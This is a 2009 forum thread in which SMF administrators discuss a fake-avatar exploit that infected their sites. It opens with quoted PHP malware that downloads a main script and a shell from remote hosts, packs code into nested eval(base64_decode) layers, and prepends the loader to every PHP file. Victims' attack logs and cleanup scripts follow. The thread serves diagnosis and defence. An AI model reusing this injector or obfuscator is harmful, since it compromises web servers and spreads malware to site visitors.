$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 03:21:22 PM
<<< Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

Yeah, lock the windows and leave the door open.
Title: Re: Hacked, script injection
Post by: sjokomelk on May 06, 2009, 04:00:28 PM
Think I have at least worked out what the injection does.

The <?php eval(base64_decode  <insert value here>
contains an address to a folder in the installation.

In my case it was a theme helios multi template.

From 28th of April, until now, 25mb of files was stored there.
Over 2100 files.

All of which seems to be links to other infected sites which has been injected with commercials. With several commercials in each.
Many of the commercials seems to be flash files, which I haven't tested to run yet, but I downloaded all the files that the hack left and I'm going to inspect those closely.

Not that I will be able to make a difference in sorting out how to fix it, unless you can run a preg_replace and remove <? from files uploaded. But I'm not there yet with my php knowledge, so I'll just continue researching and posting what I find.
Title: Re: Hacked, script injection
Post by: Rumboogy on May 06, 2009, 08:46:35 PM
He got me today too...I am in the process of restoring a backup (I hope).

I had a member ask if they could get a virus from this code? How do I answer that question.

Thanks,

Wally
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?
Title: Re: Hacked, script injection
Post by: JBlaze on May 06, 2009, 10:18:04 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 10:24:35 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!(https://www.simplemachines.org/community/proxy.php?request=http%3A%2F%2Fgregnmary.gotdns.com%3A8080%2Fpix%2Fbulb.gif&hash=864b6ce0bcaedbd85ad5d1f39282bf7a)

Now why on Earth didn't I think of that ::)
Title: Re: Hacked, script injection
Post by: JBlaze on May 06, 2009, 10:25:19 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!(https://www.simplemachines.org/community/proxy.php?request=http%3A%2F%2Fgregnmary.gotdns.com%3A8080%2Fpix%2Fbulb.gif&hash=864b6ce0bcaedbd85ad5d1f39282bf7a)

Now why on Earth didn't I think of that ::)

Need to think outside the box :)
Title: Re: Hacked, script injection
Post by: djkimmel on May 06, 2009, 11:05:37 PM
Can't the person just come back again using a different name?

I had no idea someone could upload a fake avatar to the default attachments directory and cause this much damage and work. I do now.

SMF 1.1.8

I have the bookmark mod and the donate mod. I think that is it. I have tinymce on another path in a mambo install. That is where the 'avatar' script put the files that infected all of my PHP files on my part of the shared server. The script reported it was looking for the longest path only though not tinymce - see below.

I was trying to figure out what this new 'member' krisbarteo was up to when the forum reported he/she was trying to edit his/her theme. I had already put him/her in a limited group that can't post or pm because of the same Latvian IP address as mentioned above - lots of visitors from Europe IPs lately who have been trying to spam.

Instead of getting a list of themes with how many persons were in each when I accessed them in admin (I have everyone in one theme) I got an output web page 244 pages long in MS Word (when I copied it) of an upload to the mambo directory and a message saying 'injecting PHP files' along with a list of all the PHP files that were changed across all my folders/domains/programs.

ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220’ � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH

What a nightmare! My web host security person was able to remove the injected PHP script from the tops of all the PHP files for me thank goodness, but I did not at first know what happened other than the script output I got when I clicked on 'choose themes...' so I knew the problem had originated somehow with SMF. My confidence is battered. I did not know something this 'simple' could bypass so much of the server security, htaccess and folder permissions.

After all the work it will take the rest of the evening to put things to rights, I wonder how likely it is something similar will happen again now? I will definitely disallow uploading their own avatars. Some members won't like that, but it's better than having this happen again.
Title: Re: Hacked, script injection
Post by: JBlaze on May 06, 2009, 11:21:19 PM
Can you post that code in code tags?
Title: Re: Hacked, script injection
Post by: djkimmel on May 07, 2009, 12:02:30 AM
Code: [Select]
ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220’ � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path [/home/username/public_html/forum/index.php]
[6910002]
1.0
http://www.greatlakesbass.com/forum/index.php?action=theme;sa=pick;u=-1;sesc=07d0####ddf20ad1792de13df1a8188e
root dir path [/home/username/public_html/]

SYSTEM: Linux servername #.#.##.# #5 SMP Mon Mar 30 04:51:09 CDT 2009 i686 i686 i386 GNU/Linux
MY USER ID: #####; MY GROUP ID: #####; CURRENT USER: username
________________________________________

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH
the longest available path: /home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/
path of main script successfully set [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/]
[5482745]
name of main script successfully set [style.css.php]
[2246876]
relative root dir successfully set [/home/username/public_html/]
[5893301]

my packed size: 0171552
main script path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/style.css.php]
[48839]
shell path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/s.php]
[58392]
INJECTING PHP FILES
GOTO: /home/username/public_html/
[uid:32148; gid:99; uname:username; gname:nobody] [0750] /home/username/public_html/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/articles/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/images/
[uid:32148; gid:32150; uname:username; gname:username] [0644] /home/username/public_html/domain/index.php [not patched] [patched]
etc, etc for 244 pages total

Sorry... a little frazzled after today.
Title: Re: Hacked, script injection
Post by: chrishicks on May 07, 2009, 01:53:25 AM
Should I be fairly safe if I have image uploads throughout my site disabled for new registers? I disabled uploads on avatars, the gallery and in the ultimate profile mod for them and I don't allow attachments anymore for storage reasons. Is there anything else I should do as precautions?
Title: Re: Hacked, script injection
Post by: oakview on May 07, 2009, 01:59:12 AM
I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
Code: [Select]
#!/bin/bash
find /directory_name '*.php' -type f | while read FILE
do
sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Lastly, the forum I run doesn't have any need to entertain visitors from the RIPE Network where the vast majority of attacks come from, so I added denials for all the RIPE Network IP blocks. Since I've done that, we've been clean and the server log is full of denials from the RIPE geographic area. As an afterthought, I pulled the guys referring link from the log and reported him. Probably spoofed, but who knows, I may just get lucky.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 07, 2009, 02:21:54 AM
I wouldn't really recommend banning the whole RIPE IP area... It is geographically about 25% of the world...
Title: Re: Hacked, script injection
Post by: oakview on May 07, 2009, 02:41:21 AM
Quote
It is geographically about 25% of the world...

True - we considered the ramifications, but in the end decided to implement the ban since our forum's subject matter is pretty localized. Not the best choice for everyone I'd venture to say. Draconian measures need to be thought out very carefully as we did.
Title: Re: Hacked, script injection
Post by: ellion on May 07, 2009, 04:47:49 AM
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.

i had this hack but it has not been completed, i managed to ban krisbarteo before he finished the job. i have got a lot  of errors in the log.

the user did upload an avatar but it was not an image. the comment for the avatar was
Code: [Select]
JPEG image data, EXIF standard 2.2, comment: "<?php;$url 'http://wplsat23.n" 
 the avatars where in the attachment folder

there was no other SW (that i installed) on the server.

i have put my forum in maintenance mode, although everything still seems to be working alright, as yet i have not started to examine the pages of the forum.
Title: Re: Hacked, script injection
Post by: sjokomelk on May 07, 2009, 05:45:21 AM
If you get a lot of errors, that's the first sign.

I had 3 errors.
dhah  something
dgobah I think it was and something that looked like it could be a session ID or encryption string.

The avatar starts the chain reaction, if you try to change theme, at least when I tried to, I got a weird error message.

If you check your files you will notice a line on top of most of your php files:
<?php ; /**/ eval(base64_decode('long string here');

If your files doesn't have that string you are most likely alright, however I would pay close attention to error logs, and maybe even to be on the safe side, upload fresh files.

A check towards smf files will give you ?? as version numbers compared to smf original files, so that's another sign of infection as well.
Title: Re: Hacked, script injection
Post by: bsm on May 07, 2009, 06:18:47 AM
What I had done (perhaps what triggered the infection?)...

Noticed the ad for viagra or something in a post ...
Went and banned the user...(on everything I could)
Removed the post...
Deleted the user... (which also removed the avatar  -  but left the ban in place)
Then, error-log city !

To resolve and protect:
Downloaded the entire site
Removed the injected script from ALL php files (I had some backups)
I have the highest captcha setting, plus added the extra questions
Disabled avatar uploads

Now, clean as a whistle.
Title: Re: Hacked, script injection
Post by: MrPhil on May 07, 2009, 01:08:24 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

I don't think that the intent is to ban setting changes and then open up the door... AFAICT, the intent is simply to get all the PHP cruft out of .htaccess and put it all in one place: php.ini. Why not? It's just that people who are used to putting PHP settings into .htaccess need to keep in mind (when giving advice about PHP setting changes) that not everyone can do it that way. Some people even advise changing httpd.conf, but users on shared servers usually can't change it. Some people still tell others to just change all their permissions to 777 when 1) this is hazardous in some cases and 2) some hosts don't permit this. The bottom line is that you can't just say "change this file", but need to couch it in terms of all the possible places that changes could need to be.

Perhaps there should be some place in this community to point users to when they need to make PHP setting changes. It would discuss the different places and different formats they may encounter on different systems. This entry could also discuss using phpinfo() to see if changes "stick". Another entry could discuss proper permissions needed for various SMF functions, and what to do to change permissions.
Title: Re: Hacked, script injection
Post by: JBlaze on May 07, 2009, 01:22:52 PM
All your base64_decode are belong to us!

Heh :P
Title: Re: Hacked, script injection
Post by: Rumboogy on May 07, 2009, 02:22:41 PM
So is this Krisbarteo a BOT or a real person? Just curious if the anti-SPAM would have caught this...

Thanks,

Wally
Title: Re: Hacked, script injection
Post by: confusion on May 07, 2009, 02:36:27 PM
Interestingly, I have the Krisbarteo user on a few forums, and he dropped avatars on them, but my forums did not get infected.  I am running the suhosion module for php - were any of the people who did get "hacked" running sohusin?  I have the avatar if anyone is interested.
Title: Re: Hacked, script injection
Post by: JBlaze on May 07, 2009, 03:30:44 PM
So is this Krisbarteo a BOT or a real person? Just curious if the anti-SPAM would have caught this...

Thanks,

Wally

So far, the only Anti-Spam mod that whill catch him is the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod as his username, email and IP are reported to the spam blacklist. This mod will catch him if he registers and will prevent posting or anything until admin approval.
Title: Re: Hacked, script injection
Post by: busterone on May 07, 2009, 06:59:43 PM
I had 4 from the 94.142.*.* range to register before this Krisbarteo situation arose. They all had different email addies and IPs, and I believe they were human. They successfully navigated the "are you human" mod, confirmed their email, and then logged on to the forum. Each time, they were online no more than 5 minutes and logged out.
I thought it was odd that I had 4 from the same range in just a few days, and that they left right after logging on. After this thread started, I realized what was going on. As I stated earlier in this thread, I do not allow anyone but admins to upload an avatar or attachment. I beleive this is what prevented mine from being hacked. They are probably all connected to each other in some way or another.
I banned them all, deleted them, and went a step farther.  I banned the range in htaccess. Now if they or another cohort attempts to return, they get a 404 error page instead of the forum.
Title: Re: Hacked, script injection
Post by: chrishicks on May 07, 2009, 07:08:42 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

magicpromotionmm@gmail.com
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)


http://www.stopforumspam.com/search?q=94.142.128.140

lots of stuff listed onn that IP there.
Title: Re: Hacked, script injection
Post by: busterone on May 07, 2009, 07:10:48 PM
Indeed, very busy one that one is. :)
Title: Re: Hacked, script injection
Post by: Edvard on May 08, 2009, 02:19:35 AM
Our forum also got 'f.i.t.a.' by Krisbarteo. I actually manually granted this guy access to our forum, not being made suspicious by his name. If only I had been suspicious, I could have saved myself a lot of time right now during exam period at the university...  >:( Actually I was running 1.1.4, if I'm not mistaken, together with a similarly old version of Joomla. Yes, I know, old, but I was supposed to upgrade this summer, before handing over the admin task to a friend of mine.

Also, in our forum, I found the base-64 at the top, and in many .php and .html files I found malicious links to some russian sites that would invariably infect visiting machines with rootkit.hacktool. I believe my machine now also is infected with it and I haven't had the time to rid it of that.

What did I do:
- delete the whole public_html directory on the server
- uploaded my latest backup dating from december 2007 (!)
- carefully adding files from a backup I took after the virus attack (attachments, avatars, updated code)

The site and forum ran again, but only short time after I got messages on my own machine and from forum members that it was trying to infect machines again.

I just got so angry, after having used so much time on this silly virus, but I just must slay it...

So, I deleted all of my files from the server again. Now for some reason I don't even have public_html left so I will have the web hotel restore it again, so I can once more upload my backup from 2007. This time, I will make sure to upgrade both Joomla and SMF to the newest versions before maticulously putting back files from my infected backup.

By the way, I cannot see that Krisbarteo had uploaded any avatar, strangely enough. Must he have done that, in order to spread the virus onto our site, or could he have done it otherwise? Neither does our forum give users the option of changing the template, it is set on the one I made.

When maticulously putting files back from the infected version, apart from the first line containing the base-64 code, what other code should I be wary about? And are there any files in particular that can make the virus spring up again?
Title: Re: Hacked, script injection
Post by: kwah on May 08, 2009, 04:43:08 AM
There is a number of forum installations reported to be vulnerable to this hack.

I am not sure, but did I miss official opinion from SMF developers on the problem?
Title: Re: Hacked, script injection
Post by: Kindred on May 08, 2009, 07:58:07 AM
Edvard,

Check with your host about a backup.  Typically the host saves a backup at least once a month, so they may be able to restore your site to a set more recent than 2007.

If you were running 1.1.4, there are a number of ways that you could have been infected. That is why it is critical to keep up to date with security releases.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:
Code: [Select]
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.

Title: Re: Hacked, script injection
Post by: pr9phet on May 08, 2009, 12:44:31 PM
So did someone come up with a sure fire way to prevent this from working, other than disabling avatar uploads?
Title: Re: Hacked, script injection
Post by: confusion on May 08, 2009, 01:07:26 PM
This has got me pretty nervous.

Also, I found this in my referrer file:
Code: [Select]
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.
Title: Re: Hacked, script injection
Post by: rbbot on May 08, 2009, 04:14:17 PM
I'd recommend banning the subnet 94.142.128.0/21 which is subnet allocated to the AS number of the Latvian hosting company from which these attacks originate - at your firewall if you can rather than in forums settings. According to their website, it's not an ISP, just a hosting provider, so unless you are expecting other servers to connect to yours....

The hosting company is http://www.cssgroup.lv/?lang=eng
Title: Re: Hacked, script injection
Post by: whatnow on May 08, 2009, 10:01:55 PM
I need some help, I have been hacked by this and just found this tread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key they post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all news ones in and what is causing my pages to go blank now?

Thanks
GrannyD
Title: Re: Hacked, script injection
Post by: Tiribulus on May 08, 2009, 10:26:47 PM
This has got me pretty nervous.

Also, I found this in my referrer file:
Code: [Select]
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

I meant that this topic as a whole has me worried, but I do appreciate the explanation. Still doesn't sound too good though.
Title: Re: Hacked, script injection
Post by: oakview on May 08, 2009, 10:42:24 PM
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

